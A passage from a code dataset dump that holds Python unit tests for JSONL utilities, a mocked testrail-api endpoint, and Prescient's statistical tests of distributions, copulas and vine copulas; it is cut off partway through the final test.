{"text": "c", "start": 11, "end": 12, "id": 6},
],
"spans": [
{"start": 2, "end": 3, "token_start": 1, "token_end": 2, "label": "b"},
{"start": 4, "end": 5, "token_start": 2, "token_end": 3, "label": "i"},
{"start": 7, "end": 8, "token_start": 4, "token_end": 5, "label": "i"},
{"start": 9, "end": 10, "token_start": 5, "token_end": 6, "label": "e"},
],
}
]
expected = expected * 3
actual = read_jsonl(TEST_JSONL)
assert expected == actual
def test_write_jsonl(tmpdir):
expected = [
{
"text": "a b c\n a b c",
"tokens": [
{"text": "a", "start": 0, "end": 1, "id": 0},
{"text": "b", "start": 2, "end": 3, "id": 1},
{"text": "c", "start": 4, "end": 5, "id": 2},
{"text": "\n ", "start": 5, "end": 7, "id": 3},
{"text": "a", "start": 7, "end": 8, "id": 4},
{"text": "b", "start": 9, "end": 10, "id": 5},
{"text": "c", "start": 11, "end": 12, "id": 6},
],
"spans": [
{"start": 2, "end": 3, "token_start": 1, "token_end": 2, "label": "b"},
{"start": 4, "end": 5, "token_start": 2, "token_end": 3, "label": "i"},
{"start": 7, "end": 8, "token_start": 4, "token_end": 5, "label": "i"},
{"start": 9, "end": 10, "token_start": 5, "token_end": 6, "label": "e"},
],
}
]
expected = expected * 3
temp_file = os.path.join(tmpdir, "file.jsonl")
write_jsonl(expected, temp_file)
actual = read_jsonl(temp_file)
assert expected == actual
def test_split_list_by_linebreaks():
lst = ["a", "b", "c", None, "d"]
expected = [["a", "b", "c"], ["d"]]
    actual = _split_list_by_linebreaks(lst)
    assert expected == actual
def test_list_by_linebreaks_ending_in_None():
lst = ["a", "b", "c", float("nan"), "d", None]
expected = [["a", "b", "c"], ["d"]]
    actual = _split_list_by_linebreaks(lst)
    assert expected == actual
def test_list_by_linebreaks_starting_in_None():
lst = [None, "a", "b", "c", None, "d"]
expected = [["a", "b", "c"], ["d"]]
    actual = _split_list_by_linebreaks(lst)
    assert expected == actual
| 24.259475 | 88 | 0.414373 | 0 | 0 | 0 | 0 | 100 | 0.011953 | 0 | 0 | 3,232 | 0.386326 |
5fa141b264762a22f9a2b6309a86900f4d79fb07 | 389 | py | Python | tests/unit/test_priorities.py | anshumangoyal/testrail-api | a9b2983a59667999a8432fa0af034c1fbd07e1cc | [
"MIT"
] | 21 | 2019-04-15T07:25:48.000Z | 2022-03-19T04:21:43.000Z | tests/unit/test_priorities.py | anshumangoyal/testrail-api | a9b2983a59667999a8432fa0af034c1fbd07e1cc | [
"MIT"
] | 30 | 2019-04-15T07:18:59.000Z | 2022-03-19T07:26:57.000Z | tests/unit/test_priorities.py | anshumangoyal/testrail-api | a9b2983a59667999a8432fa0af034c1fbd07e1cc | [
"MIT"
] | 16 | 2019-02-21T11:59:32.000Z | 2022-02-23T17:33:16.000Z | import json
import responses
def test_get_priorities(api, mock, host):
mock.add_callback(
responses.GET,
'{}index.php?/api/v2/get_priorities'.format(host),
lambda x: (200, {}, json.dumps([{'id': 1, 'priority': 1}, {'id': 4, 'priority': 4}]))
)
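    # The callback returns a (status, headers, body) tuple for any GET to the
    # endpoint, so get_priorities() below is served entirely from the mock.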
resp = api.priorities.get_priorities()
assert resp[0]['id'] == 1
assert resp[1]['priority'] == 4
| 24.3125 | 93 | 0.59383 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 78 | 0.200514 |
5fa14c2eb69ff76b5ae4ab590ca445b49132d179 | 37,185 | py | Python | prescient/gosm/tester.py | iSoron/Prescient | a3c1d7c5840893ff43dca48c40dc90f083292d26 | [
"BSD-3-Clause"
] | 21 | 2020-06-03T13:54:22.000Z | 2022-02-27T18:20:35.000Z | prescient/gosm/tester.py | iSoron/Prescient | a3c1d7c5840893ff43dca48c40dc90f083292d26 | [
"BSD-3-Clause"
] | 79 | 2020-07-30T17:29:04.000Z | 2022-03-09T00:06:39.000Z | prescient/gosm/tester.py | bknueven/Prescient | 6289c06a5ea06c137cf1321603a15e0c96ddfb85 | [
"BSD-3-Clause"
] | 16 | 2020-07-14T17:05:56.000Z | 2022-02-17T17:51:13.000Z | # ___________________________________________________________________________
#
# Prescient
# Copyright 2020 National Technology & Engineering Solutions of Sandia, LLC
# (NTESS). Under the terms of Contract DE-NA0003525 with NTESS, the U.S.
# Government retains certain rights in this software.
# This software is distributed under the Revised BSD License.
# ___________________________________________________________________________
from timer import Timer,tic,toc
import os
import unittest
from copula import GaussianCopula,FrankCopula,GumbelCopula,ClaytonCopula,StudentCopula, WeightedCombinedCopula
import numpy as np
import scipy
import scipy.integrate as spi
import scipy.special as sps
import scipy.stats as spst
from base_distribution import BaseDistribution,MultiDistr
from distributions import UnivariateEmpiricalDistribution, UnivariateEpiSplineDistribution
from distributions import UnivariateNormalDistribution,MultiNormalDistribution,UnivariateStudentDistribution, MultiStudentDistribution
from vine import CVineCopula,DVineCopula
import matplotlib.pyplot as plt
import copula_experiments
from copula_experiments.copula_diagonal import diag
from copula_experiments.copula_evaluate import RankHistogram,emd_sort,emd_pyomo
from distribution_factory import distribution_factory
class EmpiricalDistributionTester(unittest.TestCase):
def setUp(self):
points = [1, 1, 2, 2, 3, 5, 6, 8, 9]
self.distribution = UnivariateEmpiricalDistribution(points)
def test_at_point(self):
self.assertAlmostEqual(self.distribution.cdf(1), 2 / 10)
self.assertAlmostEqual(self.distribution.cdf_inverse(2 / 10), 1)
def test_before_first(self):
self.assertAlmostEqual(self.distribution.cdf(0.5), 1 / 10)
self.assertAlmostEqual(self.distribution.cdf_inverse(1 / 10), 0.5)
def test_far_before_first(self):
self.assertEqual(self.distribution.cdf(-4), 0)
def test_between_points(self):
self.assertAlmostEqual(self.distribution.cdf(4), 11 / 20)
self.assertAlmostEqual(self.distribution.cdf_inverse(11 / 20), 4)
def test_after_end(self):
self.assertAlmostEqual(self.distribution.cdf(9.5), 19 / 20)
self.assertAlmostEqual(self.distribution.cdf_inverse(19 / 20), 9.5)
def test_far_after_end(self):
self.assertAlmostEqual(self.distribution.cdf(20), 1)
class EpisplineTester(unittest.TestCase):
def setUp(self):
input_data = np.random.randn(1000)
self.distribution = UnivariateEpiSplineDistribution(input_data)
def test_cdf_values(self):
self.assertAlmostEqual(self.distribution.cdf(self.distribution.alpha), 0)
self.assertAlmostEqual(self.distribution.cdf(self.distribution.alpha - 100), 0)
self.assertAlmostEqual(self.distribution.cdf(self.distribution.beta), 1)
self.assertAlmostEqual(self.distribution.cdf(self.distribution.beta + 100), 1)
def test_region_probability(self):
# Tests the region probability by asserting the disjoint union of all regions must add up to 1
midpoint = (self.distribution.alpha + self.distribution.beta) / 2
integral_value = (self.distribution.region_probability((self.distribution.alpha, midpoint))
+ self.distribution.region_probability((midpoint, self.distribution.beta)))
self.assertAlmostEqual(integral_value, 1)
one_third_way = (2*self.distribution.alpha + self.distribution.beta) / 3
two_thirds_way = (self.distribution.alpha + 2*self.distribution.beta) / 3
integral_value = (self.distribution.region_probability((self.distribution.alpha, one_third_way))
+ self.distribution.region_probability((one_third_way, two_thirds_way))
+ self.distribution.region_probability((two_thirds_way, self.distribution.beta)))
self.assertAlmostEqual(integral_value, 1)
def test_quick(self):
        print('Warning: this test must be run through runner.py')
        # Copy this code to the beginning of copula_test to see if it works,
        # then run: python3 runner.py copula_experiments/run_test.txt
        # (gosm_options is expected to be importable in that context.)
gosm_options.set_globals()
# Create output directory.
if not (os.path.isdir(gosm_options.output_directory)):
os.mkdir(gosm_options.output_directory)
X = np.arange(300)
tic()
mydistr = UnivariateEpiSplineDistribution(X)
for i in range(10):
print(mydistr.cdf(i))
toc()
class UnivariateNormalDistributionTester(unittest.TestCase):
def test_quick(self):
data = np.random.randn(1000)
dist = UnivariateNormalDistribution(input_data=data)
self.assertAlmostEqual(dist.rect_prob(-1.96,1.96),0.95,1)
def test_pdf_cdf(self):
x = -2 + 2 * np.random.randn(2000)
mydistr = UnivariateNormalDistribution(input_data=x)
res, i = spi.quad(mydistr.pdf, -1, 3)
self.assertAlmostEqual(res,mydistr.rect_prob(-1, 3),5)
def test_with_mean_var(self):
sigma = 2
mean = 3
data = sigma*np.random.randn(10000)+mean
dist = UnivariateNormalDistribution(input_data=data)
self.assertAlmostEqual(dist.cdf(4),0.6915,1)
dist = UnivariateNormalDistribution(mean = mean,var=sigma**2)
self.assertAlmostEqual(dist.cdf(4),0.6915,3)
class MultiNormalDistributionTester(unittest.TestCase):
def test_two_dimensions(self):
dimkeys = ["solar", "wind"]
dimension = len(dimkeys)
ourmean = [-4, 3]
ourcov = [[2, 0], [0, 2]]
lowerdict = {"solar": -1, "wind": 0}
upperdict = {"solar": 3, "wind": 4}
marginals = {"solar": UnivariateNormalDistribution(var=ourcov[0][0], mean=ourmean[0]),
"wind": UnivariateNormalDistribution(var=ourcov[1][1], mean=ourmean[1])}
data_array = np.random.multivariate_normal(ourmean, ourcov, 10000)
data_dict = dict.fromkeys(dimkeys)
for i in range(dimension):
data_dict[dimkeys[i]] = data_array[:, i]
dist = MultiNormalDistribution(dimkeys,input_data=data_dict)
dist2 = MultiNormalDistribution(dimkeys,mean=ourmean,cov=ourcov)
self.assertAlmostEqual(dist.rect_prob(lowerdict,upperdict),dist2.rect_prob(lowerdict,upperdict),2)
self.assertAlmostEqual(np.mean(dist.generates_X(n=1000)[:,1]),ourmean[1],1)
self.assertAlmostEqual(np.mean(dist.generates_X(n=1000)[:, 0]), ourmean[0], 1)
def test_with_gaussian_copula_1_dim(self):
mymean = 0
myvar = 2
dimkeys1 = ["solar"]
lowerdict = {"solar": -2}
upperdict = {"solar": 1}
data_array1 = np.random.multivariate_normal([mymean], [[myvar]], 10000)
data_dict1 = {"solar": data_array1[:, 0]}
marginals1 = {"solar": UnivariateNormalDistribution(input_data=data_array1[:, 0])}
unigaussian1 = GaussianCopula(input_data=data_dict1, dimkeys=dimkeys1, marginals=marginals1)
unigaussian2 = MultiNormalDistribution(dimkeys1, input_data=data_dict1)
self.assertAlmostEqual(unigaussian1.rect_prob(lowerdict, upperdict),unigaussian2.rect_prob(lowerdict, upperdict),3)
def test_with_gaussian_copula_2_dim(self):
dimkeys = ["solar", "wind"]
dimension = len(dimkeys)
ourmean = [3, 4]
ourmeandict = {"solar": 0, "wind": 0}
ourcov = [[1, 0.5], [0.5, 1]]
marginals = {"solar": UnivariateNormalDistribution(var=ourcov[0][0], mean=ourmean[0]),
"wind": UnivariateNormalDistribution(var=ourcov[1][1], mean=ourmean[1])}
valuedict = {"solar": 0, "wind": 0}
lowerdict = {"solar": 2, "wind": 3}
upperdict = {"solar": 4, "wind": 5}
data_array = np.random.multivariate_normal(ourmean, ourcov, 100000)
data_dict = dict.fromkeys(dimkeys)
for i in range(dimension):
data_dict[dimkeys[i]] = data_array[:, i]
multigaussian1 = GaussianCopula(input_data=data_dict, dimkeys=dimkeys, marginals=marginals, quadstep=0.001)
multigaussian2 = MultiNormalDistribution(dimkeys, input_data=data_dict)
valuedict = {"solar": 0.45, "wind": 0.89}
self.assertAlmostEqual(multigaussian1.rect_prob(lowerdict, upperdict),
multigaussian2.rect_prob(lowerdict, upperdict), 3)
def test_with_gaussian_copula_3_dim(self):
dimkeys = ["solar", "wind", "tide"]
dimension = len(dimkeys)
# dictin = {"solar": np.random.randn(200), "wind": np.random.randn(200)}
ourmean = [0, 0, 0]
ourcov = [[1, 0.1, 0.3], [0.1, 2, 0], [0.3, 0, 3]]
marginals = {"solar": UnivariateNormalDistribution(var=ourcov[0][0], mean=ourmean[0]),
"wind": UnivariateNormalDistribution(var=ourcov[1][1], mean=ourmean[1]),
"tide": UnivariateNormalDistribution(var=ourcov[2][2], mean=ourmean[2])}
valuedict = {"solar": 0, "wind": 0, "tide": 0}
lowerdict = {"solar": -1, "wind": -1, "tide": -1}
upperdict = {"solar": 1, "wind": 1, "tide": 1}
data_array = np.random.multivariate_normal(ourmean, ourcov, 1000)
data_dict = dict.fromkeys(dimkeys)
for i in range(dimension):
data_dict[dimkeys[i]] = data_array[:, i]
multigaussian1 = GaussianCopula(input_data=data_dict, dimkeys=dimkeys, marginals=marginals, quadstep=0.1)
multigaussian2 = MultiNormalDistribution(dimkeys, input_data=data_dict)
self.assertAlmostEqual(multigaussian1.rect_prob(lowerdict, upperdict),
multigaussian2.rect_prob(lowerdict, upperdict), 2)
self.assertAlmostEqual(multigaussian1.rect_prob(lowerdict, upperdict),multigaussian2.rect_prob(lowerdict, upperdict), 1)
class UnivariateStudentDistributionTester(unittest.TestCase):
def test_pdf_cdf(self):
x = -2 + 2 * np.random.randn(2000)
student = UnivariateStudentDistribution(input_data=x)
res, i = spi.quad(student.pdf, -1, 3)
self.assertAlmostEqual(res,student.rect_prob(-1, 3),5)
def test_in_student_copula_cdf(self):
dimkeys = ["solar", "wind"]
x = np.random.randn(2000)
dictin = {"solar": x, "wind": x + np.random.randn(2000)}
student = StudentCopula(dimkeys, dictin)
self.assertAlmostEqual(student._t(student._inverse_t(0.1)),0.1,7)
self.assertAlmostEqual(student._inverse_t(student._t(-6)),-6,7)
class MultiStudentDistributionTester(unittest.TestCase):
def test_generates_X(self):
x = np.random.randn(200)
dictin = {"solar": x, "wind": x + 0.5 * np.random.randn(200)}
dimkeys = ["solar", "wind"]
mydistr = MultiStudentDistribution(dictin)
print(mydistr.generates_X(10))
def initialize(dim=2,precision = None,copula_string='independence-copula'):
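    # Shared fixture: builds a copula of the requested family on synthetic
    # multivariate-normal samples in 1, 2 or 3 dimensions.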
if dim==1:
mymean = 0
myvar = 2
dimkeys = ["solar"]
data_array = np.random.multivariate_normal([mymean], [[myvar]], 1000)
dictin = {"solar": data_array[:, 0]}
distr_class = distribution_factory(copula_string)
mydistr = distr_class(dimkeys, dictin)
return mydistr
if dim==2:
        # For some tests, gaussian and student are less precise, so we relax the precision required:
dimkeys = ["solar", "wind"]
ourmean = [3, 4]
rho=0.5
ourcov = [[1, rho], [rho, 1]]
data_array = np.random.multivariate_normal(ourmean, ourcov, 1000)
dictin = dict.fromkeys(dimkeys)
for i in range(dim):
dictin[dimkeys[i]] = data_array[:, i]
valuedict = {"solar": 0.14, "wind": 0.49}
distr_class = distribution_factory(copula_string)
mydistr = distr_class(dimkeys, dictin)
return mydistr
if dim==3:
dimkeys = ["solar", "wind", "tide"]
dimension = len(dimkeys)
# dictin = {"solar": np.random.randn(200), "wind": np.random.randn(200)}
ourmean = [0, 0, 0]
rho01 = 0.1
rho02 = 0.3
rho12 = 0
ourcov = [[1, rho01, rho02], [rho01, 2, rho12], [rho02, rho12, 3]]
marginals = {"solar": UnivariateNormalDistribution(var=ourcov[0][0], mean=ourmean[0]),
"wind": UnivariateNormalDistribution(var=ourcov[1][1], mean=ourmean[1]),
"tide": UnivariateNormalDistribution(var=ourcov[2][2], mean=ourmean[2])}
data_array = np.random.multivariate_normal(ourmean, ourcov, 1000)
dictin = dict.fromkeys(dimkeys)
for i in range(dimension):
dictin[dimkeys[i]] = data_array[:, i]
distr_class = distribution_factory(copula_string)
mydistr = distr_class(dimkeys, dictin)
return mydistr
class CopulaTester(unittest.TestCase):
def test_quick(self,copula_string='independence-copula'):
mydistr = initialize(copula_string=copula_string)
valuedict = {"solar": 0.05, "wind": 0.12}
valuedict = {"solar": 1, "wind": 0.34}
self.assertAlmostEqual(mydistr.C(valuedict),0.34,3)
valuedict = {"solar": 0.47, "wind": 1}
self.assertAlmostEqual(mydistr.C(valuedict), 0.47,3)
def test_C_with_sample(self,copula_string='independence-copula',dim=2):
if dim==2:
mydistr = initialize(copula_string=copula_string, dim=2)
valuedict = {"solar": 0.05, "wind": 0.12}
self.assertAlmostEqual(mydistr.C(valuedict),mydistr.C_from_sample(valuedict),2)
if dim==3:
if copula_string=='frank-copula'or copula_string=='clayton-copula' or copula_string=='gumbel-copula':
print('3d not implemented for archimedian copulas')
else:
mydistr = initialize(copula_string=copula_string, dim=3)
valuedict = {"solar": 0.12, "wind": 0.23, "tide": 0.31}
self.assertAlmostEqual(mydistr.C_from_sample(valuedict, 1000), mydistr.C(valuedict), 1)
def test_partial_derivative_C(self,copula_string='independence-copula'):
"""
In this test, we check if the partial derivative is correct by integrating it
and comparing the integral with the initial function.
"""
valuedict = {"solar": 0.67, "wind": 0.82}
mydistr= initialize(copula_string=copula_string)
if copula_string=='student-copula':
precision = 2
elif copula_string=='gaussian-copula':
precision = 4
else:
precision = 7
def g(x):
return mydistr.C_partial_derivative(u=valuedict.get("solar"),v=x)
res,i= spi.quad(g,0,valuedict.get("wind"))
self.assertAlmostEqual(mydistr.C(valuedict), res, precision)
valuedict = {"solar": 0.14, "wind": 0.42}
res, i = spi.quad(g, 0, valuedict.get("wind"))
self.assertAlmostEqual(mydistr.C(valuedict), res, precision)
def test_inverse_partial_C(self,copula_string='independence-copula'):
"""
        In this test, we check that the inverse of the partial derivative is correct
        by computing f(inverse_f(x)) and inverse_f(f(x)) and checking that both equal x.
"""
valuedict = {"solar": 0.84, "wind": 0.17}
mydistr = initialize(copula_string=copula_string)
u = valuedict.get("solar")
v = valuedict.get("wind")
direct = mydistr.C_partial_derivative(valuedict=valuedict)
inverse = mydistr.inverse_C_partial_derivative(valuedict=valuedict)
self.assertAlmostEqual(u,mydistr.C_partial_derivative(u=inverse,v=v),8)
self.assertAlmostEqual(u,mydistr.inverse_C_partial_derivative(u=direct,v=v),8)
def test_c_with_C_2_dim(self,copula_string='independence-copula'):
"""
        In this test, we check that the copula density c is correct by integrating it
        over a rectangle and comparing the double integral with the copula C.
"""
valuedict = {"solar": 0.34, "wind": 0.73}
mydistr = initialize(copula_string=copula_string)
def g(x,y):
return mydistr.c(u=x,v=y)
def low_bound(x):
return 0
def up_bound(x):
return valuedict.get("wind")
res,i= spi.dblquad(g,0,valuedict.get("solar"),low_bound,up_bound)
self.assertAlmostEqual(mydistr.C(valuedict),res,4)
valuedict = {"solar": 0.12, "wind": 0.21}
res, i = spi.dblquad(g,0,valuedict.get("solar"),low_bound,up_bound)
self.assertAlmostEqual(mydistr.C(valuedict), res,4)
def test_c_with_partial_C_2_dim(self,copula_string='independence-copula'):
"""
        In this test, we check that the copula density c is consistent with the partial
        derivative of C by integrating c in one variable and comparing with that derivative.
"""
mydistr = initialize(copula_string=copula_string)
valuedict = {"solar": 0.14, "wind": 0.49}
def g(x):
return mydistr.c(u=x,v=valuedict.get("wind"))
if copula_string=='student-copula':
precision = 2
else:
precision = 6
res,i= spi.quad(g,0,valuedict.get("solar"))
self.assertAlmostEqual(mydistr.C_partial_derivative(valuedict),res,precision)
valuedict = {"solar": 0.56, "wind": 0.37}
res, i = spi.quad(g, 0, valuedict.get("solar"))
self.assertAlmostEqual(mydistr.C_partial_derivative(valuedict), res,precision)
def test_plot(self,copula_string='independence-copula',dim=2):
if dim==2:
mydistr = initialize(copula_string=copula_string,dim=dim)
n = 30 #number of points you want to display
U = mydistr.generates_U(n=n)
diag2 = diag(2)
for k in range(2): # index of the diagonal where you want to project we do both
plt.plot(U[:, 0], U[:, 1], 'go')
plt.plot([diag2.list_of_diag[k][0][1], diag2.list_of_diag[k][1][1]], 'b')
P = diag2.proj_vector(U,k)
plt.plot(P[:, 0], P[:, 1], 'ro')
plt.plot([U[:, 0], P[:, 0]], [U[:, 1], P[:, 1]], c='k')
plt.show()
if dim==3:
if copula_string=='frank-copula'or copula_string=='clayton-copula' or copula_string=='gumbel-copula':
print('Plot 3d not implemented for archimedian copulas')
else:
mydistr = initialize(dim=3,copula_string=copula_string)
n = 20 # number of points to display
U = mydistr.generates_U(n=n)
d = 3
diago = diag(d)
P = []
fig = plt.figure()
center = 0.5 * np.ones(d)
k = 2 # index of the diagonal where you want to project
ax = fig.add_subplot(111, projection='3d')
ax.scatter(U[:, 0], U[:, 1], U[:, 2], c='g', marker='o')
for i in range(n):
P = diago.proj_vector(U[i], k)
ax.scatter(P[0, 0], P[0, 1], P[0, 2], c='r', marker='o')
ax.plot([U[i, 0], P[0, 0]], [U[i, 1], P[0, 1]], [U[i, 2], P[0, 2]], c='k')
diagonal = diago.list_of_diag[k]
ax.plot([diagonal[0][0], diagonal[1][0]], [diagonal[0][1], diagonal[1][1]],
[diagonal[0][2], diagonal[1][2]],
c='b')
ax.set_xlabel(mydistr.dimkeys[0])
ax.set_ylabel(mydistr.dimkeys[1])
ax.set_zlabel(mydistr.dimkeys[2])
plt.show()
class LogLikelihoodTester(unittest.TestCase):
def test_gaussian_copula2d(self):
n = 10000
dimkeys = ["solar", "wind"]
dimension = len(dimkeys)
ourmean = [2, 3]
ourmeandict = {"solar": 0, "wind": 0}
rho = 0.5
rho2 = 0.7
ourcov = [[1, rho], [rho, 1]]
ourcov2 = [[1, rho2], [rho2, 1]]
marginals = {"solar": UnivariateNormalDistribution(var=ourcov[0][0], mean=ourmean[0]),
"wind": UnivariateNormalDistribution(var=ourcov[1][1], mean=ourmean[1])}
data_array = np.random.multivariate_normal(ourmean, ourcov, 100000)
data_array2 = np.random.multivariate_normal(ourmean, ourcov2, 100000)
data_dict = dict.fromkeys(dimkeys)
for i in range(dimension):
data_dict[dimkeys[i]] = data_array[:, i]
data_dict2 = dict.fromkeys(dimkeys)
for i in range(dimension):
data_dict2[dimkeys[i]] = data_array2[:, i]
gumbel = GumbelCopula(dimkeys, data_dict, marginals)
frank = FrankCopula(dimkeys, data_dict, marginals)
clayton = ClaytonCopula(dimkeys, data_dict, marginals)
student = StudentCopula(dimkeys, data_dict, marginals)
multigaussian1 = GaussianCopula(dimkeys=dimkeys, input_data=data_dict, marginals=marginals, quadstep=0.001)
multigaussian2 = GaussianCopula(dimkeys=dimkeys, input_data=data_dict, marginals=marginals, quadstep=0.001,
cov=ourcov2)
multigaussian3 = GaussianCopula(dimkeys=dimkeys, input_data=data_dict2, marginals=marginals, quadstep=0.001,
cov=ourcov2)
multigaussian4 = GaussianCopula(dimkeys=dimkeys, input_data=data_dict2, marginals=marginals, quadstep=0.001,
cov=ourcov)
l1=multigaussian1.c_log_likelihood()
self.assertGreater(l1,multigaussian2.c_log_likelihood())
self.assertGreater(multigaussian3.c_log_likelihood(),multigaussian4.c_log_likelihood())
self.assertGreater(l1,gumbel.c_log_likelihood())
self.assertGreater(l1, clayton.c_log_likelihood())
self.assertGreater(l1, frank.c_log_likelihood())
self.assertGreater(l1, student.c_log_likelihood())
def test_weighted_combined_copula3d(self):
dimkeys = ["solar", "wind", "tide"]
dimension = len(dimkeys)
ourmean = [0, 0, 0]
ourcov = [[1, 0.1, 0.3], [0.1, 2, 0], [0.3, 0, 3]]
marginals = {"solar": UnivariateNormalDistribution(var=ourcov[0][0], mean=ourmean[0]),
"wind": UnivariateNormalDistribution(var=ourcov[1][1], mean=ourmean[1]),
"tide": UnivariateNormalDistribution(var=ourcov[2][2], mean=ourmean[2])}
data_array = np.random.multivariate_normal(ourmean, ourcov, 10000)
data_dict = dict.fromkeys(dimkeys)
for i in range(dimension):
data_dict[dimkeys[i]] = data_array[:, i]
copulas= ['student-copula', 'gaussian-copula']
list_of_gaussian = ['gaussian-copula','gaussian-copula']
list_of_student = ['student-copula','student-copula']
weights =[0.12,0.88]
mydistr = WeightedCombinedCopula(dimkeys,data_dict,marginals,copulas,weights)
gaussian = GaussianCopula(dimkeys,data_dict,marginals)
weightedgaussian = WeightedCombinedCopula(dimkeys,data_dict,marginals,list_of_gaussian,weights)
weightedstudent = WeightedCombinedCopula(dimkeys, data_dict, marginals, list_of_student, weights)
student = StudentCopula(dimkeys,data_dict,marginals)
g = gaussian.c_log_likelihood()
s = student.c_log_likelihood()
m = mydistr.c_log_likelihood()
self.assertAlmostEqual(weightedgaussian.c_log_likelihood(),g,7)
self.assertAlmostEqual(weightedstudent.c_log_likelihood(),s,7)
self.assertGreater(g,m)
self.assertGreater(m,s)
class VineCopulaTester(unittest.TestCase):
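    # C-vines and D-vines factor the same joint density through different
    # pair-copula trees, so on Gaussian data both should agree with the plain
    # Gaussian copula up to sampling noise.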
def test_quick_dim_2(self):
dimkeys = ["solar", "wind"]
dimension = len(dimkeys)
ourmean = [1, 0.5]
ourcov = [[1, 0.3], [0.3, 2]]
marginals = {"solar": UnivariateNormalDistribution(var=ourcov[0][0], mean=ourmean[0]),
"wind": UnivariateNormalDistribution(var=ourcov[1][1], mean=ourmean[1])}
data_array = np.random.multivariate_normal(ourmean, ourcov, 10000)
data_dict = dict.fromkeys(dimkeys)
for i in range(dimension):
data_dict[dimkeys[i]] = data_array[:, i]
pair_copulae_strings = [[None, 'student-copula'],
[None, None]]
valuedict = {"solar": 0.96, "wind": 0.87}
CVine = CVineCopula(dimkeys, data_dict, marginals, pair_copulae_strings)
DVine = DVineCopula(dimkeys, data_dict, marginals, pair_copulae_strings)
gaussiancopula = GaussianCopula(dimkeys,data_dict,marginals)
gaussiancopula.c(valuedict)
self.assertAlmostEqual(CVine.C(valuedict),DVine.C(valuedict),1)
self.assertAlmostEqual(gaussiancopula.C(valuedict), DVine.C(valuedict), 1)
self.assertAlmostEqual(CVine.C(valuedict), gaussiancopula.C(valuedict), 1)
def test_quick_dim_3(self):
dimkeys = ["solar", "wind", "tide"]
dimension = len(dimkeys)
ourmean = [0, 0, 0]
ourcov = [[1, 0.1, 0.3], [0.1, 2, 0], [0.3, 0, 3]]
marginals = {"solar": UnivariateNormalDistribution(var=ourcov[0][0], mean=ourmean[0]),
"wind": UnivariateNormalDistribution(var=ourcov[1][1], mean=ourmean[1]),
"tide": UnivariateNormalDistribution(var=ourcov[2][2], mean=ourmean[2])}
data_array = np.random.multivariate_normal(ourmean, ourcov, 10000)
data_dict = dict.fromkeys(dimkeys)
for i in range(dimension):
data_dict[dimkeys[i]] = data_array[:, i]
pair_copulae_strings = [[None, 'student-copula', 'frank-copula'],
[None, None, 'clayton-copula'],
[None, None, None]]
valuedict = {"solar": 0.43, "wind": 0.92, "tide": 0.27}
print('CVine')
CVine = CVineCopula(dimkeys, data_dict, marginals, pair_copulae_strings)
print(CVine.C(valuedict=valuedict))
print(CVine.c(valuedict))
print('DVine')
DVine = DVineCopula(dimkeys, data_dict, marginals, pair_copulae_strings)
print(DVine.C(valuedict=valuedict))
print(DVine.c(valuedict))
def test_with_multinormal_3_dim(self):
dimkeys = ["solar", "wind", "tide"]
dimension = len(dimkeys)
ourmean = [0, 0, 0]
ourcov = [[1, 0.1, 0.3], [0.1, 2, 0], [0.3, 0, 3]]
marginals = {"solar": UnivariateNormalDistribution(var=ourcov[0][0], mean=ourmean[0]),
"wind": UnivariateNormalDistribution(var=ourcov[1][1], mean=ourmean[1]),
"tide": UnivariateNormalDistribution(var=ourcov[2][2], mean=ourmean[2])}
valuedict = {"solar": 0, "wind": 0, "tide": 0}
lowerdict = {"solar": -3, "wind": -2.3, "tide": -0.9}
upperdict = {"solar": 1, "wind": 1.4, "tide": 2.7}
data_array = np.random.multivariate_normal(ourmean, ourcov, 10000)
data_dict = dict.fromkeys(dimkeys)
for i in range(dimension):
data_dict[dimkeys[i]] = data_array[:, i]
pair_copulae_strings = [[None, 'gaussian-copula', 'gaussian-copula'],
[None, None, 'gaussian-copula'],
[None, None, None]]
with Timer('MultiNormal'):
multigaussian = MultiNormalDistribution(dimkeys, input_data=data_dict)
print(multigaussian.rect_prob(lowerdict, upperdict))
cvine = CVineCopula(dimkeys, data_dict, marginals, pair_copulae_strings)
with Timer('CVine rect_prob calculus'):
print(cvine.rect_prob(lowerdict, upperdict))
dvine = DVineCopula(dimkeys, data_dict, marginals, pair_copulae_strings)
with Timer('DVine rect_prob calculus'):
print(dvine.rect_prob(lowerdict, upperdict))
def test_with_multinormal_4_dim(self):
dimkeys = ["solar", "wind", "tide","geo"]
dimension = len(dimkeys)
ourmean = [0, 0, 0, 0]
ourcov = [[1, 0.1, 0.3,0.4], [0.1, 2, 0,0], [0.3, 0, 3,0],[0.4,0,0,4]]
marginals = {"solar": UnivariateNormalDistribution(var=ourcov[0][0], mean=ourmean[0]),
"wind": UnivariateNormalDistribution(var=ourcov[1][1], mean=ourmean[1]),
"tide": UnivariateNormalDistribution(var=ourcov[2][2], mean=ourmean[2]),
"geo":UnivariateNormalDistribution(var=ourcov[3][3], mean=ourmean[3])}
valuedict = {"solar": 0, "wind": 0, "tide": 0,"geo":0}
lowerdict = {"solar": -1, "wind": -1, "tide": -1,"geo":-2}
upperdict = {"solar": 1, "wind": 1, "tide": 1,"geo":2}
data_array = np.random.multivariate_normal(ourmean, ourcov, 10000)
data_dict = dict.fromkeys(dimkeys)
for i in range(dimension):
data_dict[dimkeys[i]] = data_array[:, i]
pair_copulae_strings = [[None, 'gaussian-copula', 'gaussian-copula','gaussian-copula'],
[None, None, 'gaussian-copula','gaussian-copula'],
[None, None, None,'gaussian-copula'],
[None,None,None,None]]
with Timer('MultiNormal'):
multigaussian = MultiNormalDistribution(dimkeys, input_data=data_dict)
print(multigaussian.rect_prob(lowerdict, upperdict))
cvine = CVineCopula(dimkeys, data_dict, marginals, pair_copulae_strings)
with Timer('CVine rect_prob calculus'):
print(cvine.rect_prob(lowerdict, upperdict))
dvine = DVineCopula(dimkeys, data_dict, marginals, pair_copulae_strings)
with Timer('DVine rect_prob calculus'):
print(dvine.rect_prob(lowerdict, upperdict))
def test_plot(self):
dimkeys = ["solar", "wind", "tide"]
dimension = len(dimkeys)
ourmean = [0, 0, 0]
ourcov = [[1, 1.3, 1.2], [1.3, 2, 0], [1.2, 0, 1.5]]
marginals = {"solar": UnivariateNormalDistribution(var=ourcov[0][0], mean=ourmean[0]),
"wind": UnivariateNormalDistribution(var=ourcov[1][1], mean=ourmean[1]),
"tide": UnivariateNormalDistribution(var=ourcov[2][2], mean=ourmean[2])}
data_array = np.random.multivariate_normal(ourmean, ourcov, 10000)
data_dict = dict.fromkeys(dimkeys)
for i in range(dimension):
data_dict[dimkeys[i]] = data_array[:, i]
pair_copulae_strings = [[None, 'gaussian-copula', 'frank-copula'],
